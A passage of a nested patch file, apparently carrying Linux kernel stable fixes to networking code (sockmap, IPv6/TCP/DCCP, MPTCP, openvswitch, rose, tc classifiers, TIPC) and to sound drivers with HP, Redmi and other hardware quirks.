++	if (WARN_ON_ONCE(saved_destroy == sock_map_destroy))
++		return;
++	if (saved_destroy)
++		saved_destroy(sk);
+ }
+ EXPORT_SYMBOL_GPL(sock_map_destroy);
+ 
+@@ -1615,16 +1617,21 @@ void sock_map_close(struct sock *sk, long timeout)
+ 	if (unlikely(!psock)) {
+ 		rcu_read_unlock();
+ 		release_sock(sk);
+-		return sk->sk_prot->close(sk, timeout);
++		saved_close = READ_ONCE(sk->sk_prot)->close;
++	} else {
++		saved_close = psock->saved_close;
++		sock_map_remove_links(sk, psock);
++		rcu_read_unlock();
++		sk_psock_stop(psock);
++		release_sock(sk);
++		cancel_work_sync(&psock->work);
++		sk_psock_put(sk, psock);
+ 	}
+-
+-	saved_close = psock->saved_close;
+-	sock_map_remove_links(sk, psock);
+-	rcu_read_unlock();
+-	sk_psock_stop(psock);
+-	release_sock(sk);
+-	cancel_work_sync(&psock->work);
+-	sk_psock_put(sk, psock);
++	/* Make sure we do not recurse. This is a bug.
++	 * Leak the socket instead of crashing on a stack overflow.
++	 */
++	if (WARN_ON_ONCE(saved_close == sock_map_close))
++		return;
+ 	saved_close(sk, timeout);
+ }
+ EXPORT_SYMBOL_GPL(sock_map_close);
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index 602f3432d80bc..7a736c352dc4b 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -551,11 +551,9 @@ static struct sock *dccp_v6_request_recv_sock(const struct sock *sk,
+ 	*own_req = inet_ehash_nolisten(newsk, req_to_sk(req_unhash), NULL);
+ 	/* Clone pktoptions received with SYN, if we own the req */
+ 	if (*own_req && ireq->pktopts) {
+-		newnp->pktoptions = skb_clone(ireq->pktopts, GFP_ATOMIC);
++		newnp->pktoptions = skb_clone_and_charge_r(ireq->pktopts, newsk);
+ 		consume_skb(ireq->pktopts);
+ 		ireq->pktopts = NULL;
+-		if (newnp->pktoptions)
+-			skb_set_owner_r(newnp->pktoptions, newsk);
+ 	}
+ 
+ 	return newsk;
+@@ -615,7 +613,7 @@ static int dccp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
+ 					       --ANK (980728)
+ 	 */
+ 	if (np->rxopt.all)
+-		opt_skb = skb_clone(skb, GFP_ATOMIC);
++		opt_skb = skb_clone_and_charge_r(skb, sk);
+ 
+ 	if (sk->sk_state == DCCP_OPEN) { /* Fast path */
+ 		if (dccp_rcv_established(sk, skb, dccp_hdr(skb), skb->len))
+@@ -679,7 +677,6 @@ ipv6_pktoptions:
+ 			np->flow_label = ip6_flowlabel(ipv6_hdr(opt_skb));
+ 		if (ipv6_opt_accepted(sk, opt_skb,
+ 				      &DCCP_SKB_CB(opt_skb)->header.h6)) {
+-			skb_set_owner_r(opt_skb, sk);
+ 			memmove(IP6CB(opt_skb),
+ 				&DCCP_SKB_CB(opt_skb)->header.h6,
+ 				sizeof(struct inet6_skb_parm));
+diff --git a/net/ipv6/datagram.c b/net/ipv6/datagram.c
+index ba28aeb7cade0..e70ace403bbd0 100644
+--- a/net/ipv6/datagram.c
++++ b/net/ipv6/datagram.c
+@@ -51,7 +51,7 @@ static void ip6_datagram_flow_key_init(struct flowi6 *fl6, struct sock *sk)
+ 	fl6->flowi6_mark = sk->sk_mark;
+ 	fl6->fl6_dport = inet->inet_dport;
+ 	fl6->fl6_sport = inet->inet_sport;
+-	fl6->flowlabel = np->flow_label;
++	fl6->flowlabel = ip6_make_flowinfo(np->tclass, np->flow_label);
+ 	fl6->flowi6_uid = sk->sk_uid;
+ 
+ 	if (!oif)
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index f0548dbcabd2d..ea1ecf5fe947c 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -272,6 +272,7 @@ static int tcp_v6_connect(struct sock *sk, struct sockaddr *uaddr,
+ 	fl6.flowi6_proto = IPPROTO_TCP;
+ 	fl6.daddr = sk->sk_v6_daddr;
+ 	fl6.saddr = saddr ? *saddr : np->saddr;
++	fl6.flowlabel = ip6_make_flowinfo(np->tclass, np->flow_label);
+ 	fl6.flowi6_oif = sk->sk_bound_dev_if;
+ 	fl6.flowi6_mark = sk->sk_mark;
+ 	fl6.fl6_dport = usin->sin6_port;
+@@ -1388,14 +1389,11 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
+ 
+ 		/* Clone pktoptions received with SYN, if we own the req */
+ 		if (ireq->pktopts) {
+-			newnp->pktoptions = skb_clone(ireq->pktopts,
+-						      sk_gfp_mask(sk, GFP_ATOMIC));
++			newnp->pktoptions = skb_clone_and_charge_r(ireq->pktopts, newsk);
+ 			consume_skb(ireq->pktopts);
+ 			ireq->pktopts = NULL;
+-			if (newnp->pktoptions) {
++			if (newnp->pktoptions)
+ 				tcp_v6_restore_cb(newnp->pktoptions);
+-				skb_set_owner_r(newnp->pktoptions, newsk);
+-			}
+ 		}
+ 	} else {
+ 		if (!req_unhash && found_dup_sk) {
+@@ -1467,7 +1465,7 @@ int tcp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
+ 					       --ANK (980728)
+ 	 */
+ 	if (np->rxopt.all)
+-		opt_skb = skb_clone(skb, sk_gfp_mask(sk, GFP_ATOMIC));
++		opt_skb = skb_clone_and_charge_r(skb, sk);
+ 
+ 	reason = SKB_DROP_REASON_NOT_SPECIFIED;
+ 	if (sk->sk_state == TCP_ESTABLISHED) { /* Fast path */
+@@ -1553,7 +1551,6 @@ ipv6_pktoptions:
+ 		if (np->repflow)
+ 			np->flow_label = ip6_flowlabel(ipv6_hdr(opt_skb));
+ 		if (ipv6_opt_accepted(sk, opt_skb, &TCP_SKB_CB(opt_skb)->header.h6)) {
+-			skb_set_owner_r(opt_skb, sk);
+ 			tcp_v6_restore_cb(opt_skb);
+ 			opt_skb = xchg(&np->pktoptions, opt_skb);
+ 		} else {
+diff --git a/net/mpls/af_mpls.c b/net/mpls/af_mpls.c
+index b52afe316dc41..f1f43894efb8e 100644
+--- a/net/mpls/af_mpls.c
++++ b/net/mpls/af_mpls.c
+@@ -1428,6 +1428,7 @@ static int mpls_dev_sysctl_register(struct net_device *dev,
+ free:
+ 	kfree(table);
+ out:
++	mdev->sysctl = NULL;
+ 	return -ENOBUFS;
+ }
+ 
+@@ -1437,6 +1438,9 @@ static void mpls_dev_sysctl_unregister(struct net_device *dev,
+ 	struct net *net = dev_net(dev);
+ 	struct ctl_table *table;
+ 
++	if (!mdev->sysctl)
++		return;
++
+ 	table = mdev->sysctl->ctl_table_arg;
+ 	unregister_net_sysctl_table(mdev->sysctl);
+ 	kfree(table);
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 9813ed0fde9bd..5e38a0abbabae 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -992,8 +992,8 @@ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ {
+ 	int addrlen = sizeof(struct sockaddr_in);
+ 	struct sockaddr_storage addr;
+-	struct mptcp_sock *msk;
+ 	struct socket *ssock;
++	struct sock *newsk;
+ 	int backlog = 1024;
+ 	int err;
+ 
+@@ -1002,17 +1002,15 @@ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ 	if (err)
+ 		return err;
+ 
+-	msk = mptcp_sk(entry->lsk->sk);
+-	if (!msk) {
+-		err = -EINVAL;
+-		goto out;
+-	}
++	newsk = entry->lsk->sk;
++	if (!newsk)
++		return -EINVAL;
+ 
+-	ssock = __mptcp_nmpc_socket(msk);
+-	if (!ssock) {
+-		err = -EINVAL;
+-		goto out;
+-	}
++	lock_sock(newsk);
++	ssock = __mptcp_nmpc_socket(mptcp_sk(newsk));
++	release_sock(newsk);
++	if (!ssock)
++		return -EINVAL;
+ 
+ 	mptcp_info2sockaddr(&entry->addr, &addr, entry->addr.family);
+ #if IS_ENABLED(CONFIG_MPTCP_IPV6)
+@@ -1022,20 +1020,16 @@ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ 	err = kernel_bind(ssock, (struct sockaddr *)&addr, addrlen);
+ 	if (err) {
+ 		pr_warn("kernel_bind error, err=%d", err);
+-		goto out;
++		return err;
+ 	}
+ 
+ 	err = kernel_listen(ssock, backlog);
+ 	if (err) {
+ 		pr_warn("kernel_listen error, err=%d", err);
+-		goto out;
++		return err;
+ 	}
+ 
+ 	return 0;
+-
+-out:
+-	sock_release(entry->lsk);
+-	return err;
+ }
+ 
+ int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct sock_common *skc)
+@@ -1327,7 +1321,7 @@ static int mptcp_nl_cmd_add_addr(struct sk_buff *skb, struct genl_info *info)
+ 		return -EINVAL;
+ 	}
+ 
+-	entry = kmalloc(sizeof(*entry), GFP_KERNEL_ACCOUNT);
++	entry = kzalloc(sizeof(*entry), GFP_KERNEL_ACCOUNT);
+ 	if (!entry) {
+ 		GENL_SET_ERR_MSG(info, "can't allocate addr");
+ 		return -ENOMEM;
+@@ -1338,22 +1332,21 @@ static int mptcp_nl_cmd_add_addr(struct sk_buff *skb, struct genl_info *info)
+ 		ret = mptcp_pm_nl_create_listen_socket(skb->sk, entry);
+ 		if (ret) {
+ 			GENL_SET_ERR_MSG(info, "create listen socket error");
+-			kfree(entry);
+-			return ret;
++			goto out_free;
+ 		}
+ 	}
+ 	ret = mptcp_pm_nl_append_new_local_addr(pernet, entry);
+ 	if (ret < 0) {
+ 		GENL_SET_ERR_MSG(info, "too many addresses or duplicate one");
+-		if (entry->lsk)
+-			sock_release(entry->lsk);
+-		kfree(entry);
+-		return ret;
++		goto out_free;
+ 	}
+ 
+ 	mptcp_nl_add_subflow_or_signal_addr(sock_net(skb->sk));
+-
+ 	return 0;
++
++out_free:
++	__mptcp_pm_release_addr_entry(entry);
++	return ret;
+ }
+ 
+ int mptcp_pm_get_flags_and_ifindex_by_id(struct mptcp_sock *msk, unsigned int id,
+diff --git a/net/mptcp/sockopt.c b/net/mptcp/sockopt.c
+index c7cb68c725b29..696ba398d699a 100644
+--- a/net/mptcp/sockopt.c
++++ b/net/mptcp/sockopt.c
+@@ -769,17 +769,24 @@ static int mptcp_setsockopt_sol_tcp_defer(struct mptcp_sock *msk, sockptr_t optv
+ 	return tcp_setsockopt(listener->sk, SOL_TCP, TCP_DEFER_ACCEPT, optval, optlen);
+ }
+ 
+-static int mptcp_setsockopt_sol_tcp_fastopen_connect(struct mptcp_sock *msk, sockptr_t optval,
+-						     unsigned int optlen)
++static int mptcp_setsockopt_first_sf_only(struct mptcp_sock *msk, int level, int optname,
++					  sockptr_t optval, unsigned int optlen)
+ {
++	struct sock *sk = (struct sock *)msk;
+ 	struct socket *sock;
++	int ret = -EINVAL;
+ 
+-	/* Limit to first subflow */
++	/* Limit to first subflow, before the connection establishment */
++	lock_sock(sk);
+ 	sock = __mptcp_nmpc_socket(msk);
+ 	if (!sock)
+-		return -EINVAL;
++		goto unlock;
+ 
+-	return tcp_setsockopt(sock->sk, SOL_TCP, TCP_FASTOPEN_CONNECT, optval, optlen);
++	ret = tcp_setsockopt(sock->sk, level, optname, optval, optlen);
++
++unlock:
++	release_sock(sk);
++	return ret;
+ }
+ 
+ static int mptcp_setsockopt_sol_tcp(struct mptcp_sock *msk, int optname,
+@@ -811,7 +818,8 @@ static int mptcp_setsockopt_sol_tcp(struct mptcp_sock *msk, int optname,
+ 	case TCP_DEFER_ACCEPT:
+ 		return mptcp_setsockopt_sol_tcp_defer(msk, optval, optlen);
+ 	case TCP_FASTOPEN_CONNECT:
+-		return mptcp_setsockopt_sol_tcp_fastopen_connect(msk, optval, optlen);
++		return mptcp_setsockopt_first_sf_only(msk, SOL_TCP, optname,
++						      optval, optlen);
+ 	}
+ 
+ 	return -EOPNOTSUPP;
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 929b0ee8b3d5f..c4971bc42f60f 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1631,7 +1631,7 @@ int mptcp_subflow_create_socket(struct sock *sk, unsigned short family,
+ 	if (err)
+ 		return err;
+ 
+-	lock_sock(sf->sk);
++	lock_sock_nested(sf->sk, SINGLE_DEPTH_NESTING);
+ 
+ 	/* the newly created socket has to be in the same cgroup as its parent */
+ 	mptcp_attach_cgroup(sk, sf->sk);
+diff --git a/net/openvswitch/meter.c b/net/openvswitch/meter.c
+index 6e38f68f88c26..f2698d2316dfc 100644
+--- a/net/openvswitch/meter.c
++++ b/net/openvswitch/meter.c
+@@ -449,7 +449,7 @@ static int ovs_meter_cmd_set(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	err = attach_meter(meter_tbl, meter);
+ 	if (err)
+-		goto exit_unlock;
++		goto exit_free_old_meter;
+ 
+ 	ovs_unlock();
+ 
+@@ -472,6 +472,8 @@ static int ovs_meter_cmd_set(struct sk_buff *skb, struct genl_info *info)
+ 	genlmsg_end(reply, ovs_reply_header);
+ 	return genlmsg_reply(reply, info);
+ 
++exit_free_old_meter:
++	ovs_meter_free(old_meter);
+ exit_unlock:
+ 	ovs_unlock();
+ 	nlmsg_free(reply);
+diff --git a/net/rose/af_rose.c b/net/rose/af_rose.c
+index 36fefc3957d77..ca2b17f32670d 100644
+--- a/net/rose/af_rose.c
++++ b/net/rose/af_rose.c
+@@ -488,6 +488,12 @@ static int rose_listen(struct socket *sock, int backlog)
+ {
+ 	struct sock *sk = sock->sk;
+ 
++	lock_sock(sk);
++	if (sock->state != SS_UNCONNECTED) {
++		release_sock(sk);
++		return -EINVAL;
++	}
++
+ 	if (sk->sk_state != TCP_LISTEN) {
+ 		struct rose_sock *rose = rose_sk(sk);
+ 
+@@ -497,8 +503,10 @@ static int rose_listen(struct socket *sock, int backlog)
+ 		memset(rose->dest_digis, 0, AX25_ADDR_LEN * ROSE_MAX_DIGIS);
+ 		sk->sk_max_ack_backlog = backlog;
+ 		sk->sk_state           = TCP_LISTEN;
++		release_sock(sk);
+ 		return 0;
+ 	}
++	release_sock(sk);
+ 
+ 	return -EOPNOTSUPP;
+ }
+diff --git a/net/sched/act_ctinfo.c b/net/sched/act_ctinfo.c
+index eaa02f098d1c3..7275ad869f8ea 100644
+--- a/net/sched/act_ctinfo.c
++++ b/net/sched/act_ctinfo.c
+@@ -91,7 +91,7 @@ static int tcf_ctinfo_act(struct sk_buff *skb, const struct tc_action *a,
+ 	cp = rcu_dereference_bh(ca->params);
+ 
+ 	tcf_lastuse_update(&ca->tcf_tm);
+-	bstats_update(&ca->tcf_bstats, skb);
++	tcf_action_update_bstats(&ca->common, skb);
+ 	action = READ_ONCE(ca->tcf_action);
+ 
+ 	wlen = skb_network_offset(skb);
+@@ -210,8 +210,8 @@ static int tcf_ctinfo_init(struct net *net, struct nlattr *nla,
+ 	index = actparm->index;
+ 	err = tcf_idr_check_alloc(tn, &index, a, bind);
+ 	if (!err) {
+-		ret = tcf_idr_create(tn, index, est, a,
+-				     &act_ctinfo_ops, bind, false, flags);
++		ret = tcf_idr_create_from_flags(tn, index, est, a,
++						&act_ctinfo_ops, bind, flags);
+ 		if (ret) {
+ 			tcf_idr_cleanup(tn, index);
+ 			return ret;
+diff --git a/net/sched/cls_tcindex.c b/net/sched/cls_tcindex.c
+index 4bdcbee4bec56..eea8e185fcdb2 100644
+--- a/net/sched/cls_tcindex.c
++++ b/net/sched/cls_tcindex.c
+@@ -12,6 +12,7 @@
+ #include <linux/errno.h>
+ #include <linux/slab.h>
+ #include <linux/refcount.h>
++#include <linux/rcupdate.h>
+ #include <net/act_api.h>
+ #include <net/netlink.h>
+ #include <net/pkt_cls.h>
+@@ -338,6 +339,7 @@ tcindex_set_parms(struct net *net, struct tcf_proto *tp, unsigned long base,
+ 	struct tcf_result cr = {};
+ 	int err, balloc = 0;
+ 	struct tcf_exts e;
++	bool update_h = false;
+ 
+ 	err = tcf_exts_init(&e, net, TCA_TCINDEX_ACT, TCA_TCINDEX_POLICE);
+ 	if (err < 0)
+@@ -455,10 +457,13 @@ tcindex_set_parms(struct net *net, struct tcf_proto *tp, unsigned long base,
+ 		}
+ 	}
+ 
+-	if (cp->perfect)
++	if (cp->perfect) {
+ 		r = cp->perfect + handle;
+-	else
+-		r = tcindex_lookup(cp, handle) ? : &new_filter_result;
++	} else {
++		/* imperfect area is updated in-place using rcu */
++		update_h = !!tcindex_lookup(cp, handle);
++		r = &new_filter_result;
++	}
+ 
+ 	if (r == &new_filter_result) {
+ 		f = kzalloc(sizeof(*f), GFP_KERNEL);
+@@ -484,7 +489,28 @@ tcindex_set_parms(struct net *net, struct tcf_proto *tp, unsigned long base,
+ 
+ 	rcu_assign_pointer(tp->root, cp);
+ 
+-	if (r == &new_filter_result) {
++	if (update_h) {
++		struct tcindex_filter __rcu **fp;
++		struct tcindex_filter *cf;
++
++		f->result.res = r->res;
++		tcf_exts_change(&f->result.exts, &r->exts);
++
++		/* imperfect area bucket */
++		fp = cp->h + (handle % cp->hash);
++
++		/* lookup the filter, guaranteed to exist */
++		for (cf = rcu_dereference_bh_rtnl(*fp); cf;
++		     fp = &cf->next, cf = rcu_dereference_bh_rtnl(*fp))
++			if (cf->key == (u16)handle)
++				break;
++
++		f->next = cf->next;
++
++		cf = rcu_replace_pointer(*fp, f, 1);
++		tcf_exts_get_net(&cf->result.exts);
++		tcf_queue_work(&cf->rwork, tcindex_destroy_fexts_work);
++	} else if (r == &new_filter_result) {
+ 		struct tcindex_filter *nfp;
+ 		struct tcindex_filter __rcu **fp;
+ 
+diff --git a/net/sched/sch_htb.c b/net/sched/sch_htb.c
+index 3afac9c21a763..67b1879ea8e10 100644
+--- a/net/sched/sch_htb.c
++++ b/net/sched/sch_htb.c
+@@ -427,7 +427,10 @@ static void htb_activate_prios(struct htb_sched *q, struct htb_class *cl)
+ 	while (cl->cmode == HTB_MAY_BORROW && p && mask) {
+ 		m = mask;
+ 		while (m) {
+-			int prio = ffz(~m);
++			unsigned int prio = ffz(~m);
++
++			if (WARN_ON_ONCE(prio >= ARRAY_SIZE(p->inner.clprio)))
++				break;
+ 			m &= ~(1 << prio);
+ 
+ 			if (p->inner.clprio[prio].feed.rb_node)
+diff --git a/net/sctp/diag.c b/net/sctp/diag.c
+index d9c6d8f30f093..b0ce1080842d4 100644
+--- a/net/sctp/diag.c
++++ b/net/sctp/diag.c
+@@ -343,11 +343,9 @@ static int sctp_sock_filter(struct sctp_endpoint *ep, struct sctp_transport *tsp
+ 	struct sctp_comm_param *commp = p;
+ 	struct sock *sk = ep->base.sk;
+ 	const struct inet_diag_req_v2 *r = commp->r;
+-	struct sctp_association *assoc =
+-		list_entry(ep->asocs.next, struct sctp_association, asocs);
+ 
+ 	/* find the ep only once through the transports by this condition */
+-	if (tsp->asoc != assoc)
++	if (!list_is_first(&tsp->asoc->asocs, &ep->asocs))
+ 		return 0;
+ 
+ 	if (r->sdiag_family != AF_UNSPEC && sk->sk_family != r->sdiag_family)
+diff --git a/net/socket.c b/net/socket.c
+index 73463c7c3702b..29a4bad1b1d81 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -971,9 +971,12 @@ static inline void sock_recv_drops(struct msghdr *msg, struct sock *sk,
+ static void sock_recv_mark(struct msghdr *msg, struct sock *sk,
+ 			   struct sk_buff *skb)
+ {
+-	if (sock_flag(sk, SOCK_RCVMARK) && skb)
+-		put_cmsg(msg, SOL_SOCKET, SO_MARK, sizeof(__u32),
+-			 &skb->mark);
++	if (sock_flag(sk, SOCK_RCVMARK) && skb) {
++		/* We must use a bounce buffer for CONFIG_HARDENED_USERCOPY=y */
++		__u32 mark = skb->mark;
++
++		put_cmsg(msg, SOL_SOCKET, SO_MARK, sizeof(__u32), &mark);
++	}
+ }
+ 
+ void __sock_recv_cmsgs(struct msghdr *msg, struct sock *sk,
+diff --git a/net/tipc/socket.c b/net/tipc/socket.c
+index e902b01ea3cb1..ff5bb9e4731c4 100644
+--- a/net/tipc/socket.c
++++ b/net/tipc/socket.c
+@@ -2614,6 +2614,7 @@ static int tipc_connect(struct socket *sock, struct sockaddr *dest,
+ 		/* Send a 'SYN-' to destination */
+ 		m.msg_name = dest;
+ 		m.msg_namelen = destlen;
++		iov_iter_kvec(&m.msg_iter, ITER_SOURCE, NULL, 0, 0);
+ 
+ 		/* If connect is in non-blocking case, set MSG_DONTWAIT to
+ 		 * indicate send_msg() is never blocked.
+@@ -2776,6 +2777,7 @@ static int tipc_accept(struct socket *sock, struct socket *new_sock, int flags,
+ 		__skb_queue_head(&new_sk->sk_receive_queue, buf);
+ 		skb_set_owner_r(buf, new_sk);
+ 	}
++	iov_iter_kvec(&m.msg_iter, ITER_SOURCE, NULL, 0, 0);
+ 	__tipc_sendstream(new_sock, &m, 0);
+ 	release_sock(new_sk);
+ exit:
+diff --git a/sound/pci/hda/hda_bind.c b/sound/pci/hda/hda_bind.c
+index 1a868dd9dc4b6..890c2f7c33fc2 100644
+--- a/sound/pci/hda/hda_bind.c
++++ b/sound/pci/hda/hda_bind.c
+@@ -144,6 +144,7 @@ static int hda_codec_driver_probe(struct device *dev)
+ 
+  error:
+ 	snd_hda_codec_cleanup_for_unbind(codec);
++	codec->preset = NULL;
+ 	return err;
+ }
+ 
+@@ -166,6 +167,7 @@ static int hda_codec_driver_remove(struct device *dev)
+ 	if (codec->patch_ops.free)
+ 		codec->patch_ops.free(codec);
+ 	snd_hda_codec_cleanup_for_unbind(codec);
++	codec->preset = NULL;
+ 	module_put(dev->driver->owner);
+ 	return 0;
+ }
+diff --git a/sound/pci/hda/hda_codec.c b/sound/pci/hda/hda_codec.c
+index edd653ece70d7..2e728aad67713 100644
+--- a/sound/pci/hda/hda_codec.c
++++ b/sound/pci/hda/hda_codec.c
+@@ -795,7 +795,6 @@ void snd_hda_codec_cleanup_for_unbind(struct hda_codec *codec)
+ 	snd_array_free(&codec->cvt_setups);
+ 	snd_array_free(&codec->spdif_out);
+ 	snd_array_free(&codec->verbs);
+-	codec->preset = NULL;
+ 	codec->follower_dig_outs = NULL;
+ 	codec->spdif_status_reset = 0;
+ 	snd_array_free(&codec->mixers);
+@@ -928,7 +927,6 @@ snd_hda_codec_device_init(struct hda_bus *bus, unsigned int codec_addr,
+ 	codec->depop_delay = -1;
+ 	codec->fixup_id = HDA_FIXUP_ID_NOT_SET;
+ 	codec->core.dev.release = snd_hda_codec_dev_release;
+-	codec->core.exec_verb = codec_exec_verb;
+ 	codec->core.type = HDA_DEV_LEGACY;
+ 
+ 	mutex_init(&codec->spdif_mutex);
+@@ -999,6 +997,7 @@ int snd_hda_codec_device_new(struct hda_bus *bus, struct snd_card *card,
+ 	if (snd_BUG_ON(codec_addr > HDA_MAX_CODEC_ADDRESS))
+ 		return -EINVAL;
+ 
++	codec->core.exec_verb = codec_exec_verb;
+ 	codec->card = card;
+ 	codec->addr = codec_addr;
+ 
+diff --git a/sound/pci/hda/patch_conexant.c b/sound/pci/hda/patch_conexant.c
+index 7b1a30a551f64..75e1d00074b9f 100644
+--- a/sound/pci/hda/patch_conexant.c
++++ b/sound/pci/hda/patch_conexant.c
+@@ -1125,6 +1125,7 @@ static const struct hda_device_id snd_hda_id_conexant[] = {
+ 	HDA_CODEC_ENTRY(0x14f11f87, "SN6140", patch_conexant_auto),
+ 	HDA_CODEC_ENTRY(0x14f12008, "CX8200", patch_conexant_auto),
+ 	HDA_CODEC_ENTRY(0x14f120d0, "CX11970", patch_conexant_auto),
++	HDA_CODEC_ENTRY(0x14f120d1, "SN6180", patch_conexant_auto),
+ 	HDA_CODEC_ENTRY(0x14f15045, "CX20549 (Venice)", patch_conexant_auto),
+ 	HDA_CODEC_ENTRY(0x14f15047, "CX20551 (Waikiki)", patch_conexant_auto),
+ 	HDA_CODEC_ENTRY(0x14f15051, "CX20561 (Hermosa)", patch_conexant_auto),
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 1134a493d225a..e103bb3693c06 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -832,7 +832,7 @@ do_sku:
+ 			alc_setup_gpio(codec, 0x02);
+ 			break;
+ 		case 7:
+-			alc_setup_gpio(codec, 0x03);
++			alc_setup_gpio(codec, 0x04);
+ 			break;
+ 		case 5:
+ 		default:
+@@ -9432,10 +9432,17 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	 SND_PCI_QUIRK(0x103c, 0x8abb, "HP ZBook Firefly 14 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad1, "HP EliteBook 840 14 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b42, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b43, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b44, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b45, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b46, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b47, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7d, "HP", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b87, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8b, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 0d283e41f66dc..36314753923b8 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -227,6 +227,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Redmi Book Pro 14 2022"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "TIMI"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Redmi Book Pro 15 2022"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+@@ -234,6 +241,20 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Blade 14 (2022) - RZ09-0427"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "RB"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Swift SFA16-41"),
++		}
++	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "IRBIS"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "15NBC1011"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/cs42l56.c b/sound/soc/codecs/cs42l56.c
+index 26066682c983e..3b0e715549c9c 100644
+--- a/sound/soc/codecs/cs42l56.c
++++ b/sound/soc/codecs/cs42l56.c
+@@ -1191,18 +1191,12 @@ static int cs42l56_i2c_probe(struct i2c_client *i2c_client)
+ 	if (pdata) {
+ 		cs42l56->pdata = *pdata;
+ 	} else {
+-		pdata = devm_kzalloc(&i2c_client->dev, sizeof(*pdata),
+-				     GFP_KERNEL);
+-		if (!pdata)
+-			return -ENOMEM;
+-
+ 		if (i2c_client->dev.of_node) {
+ 			ret = cs42l56_handle_of_data(i2c_client,
+ 						     &cs42l56->pdata);
+ 			if (ret != 0)
+ 				return ret;
+ 		}
+-		cs42l56->pdata = *pdata;
+ 	}
+ 
+ 	if (cs42l56->pdata.gpio_nreset) {
+diff --git a/sound/soc/intel/boards/sof_cs42l42.c b/sound/soc/intel/boards/sof_cs42l42.c
+index e38bd2831e6ac..e9d190cb13b0a 100644
+--- a/sound/soc/intel/boards/sof_cs42l42.c
++++ b/sound/soc/intel/boards/sof_cs42l42.c
+@@ -336,6 +336,9 @@ static int create_spk_amp_dai_links(struct device *dev,
+ 	links[*id].platforms = platform_component;
+ 	links[*id].num_platforms = ARRAY_SIZE(platform_component);
+ 	links[*id].dpcm_playback = 1;
++	/* firmware-generated echo reference */
++	links[*id].dpcm_capture = 1;
++
+ 	links[*id].no_pcm = 1;
+ 	links[*id].cpus = &cpus[*id];
+ 	links[*id].num_cpus = 1;
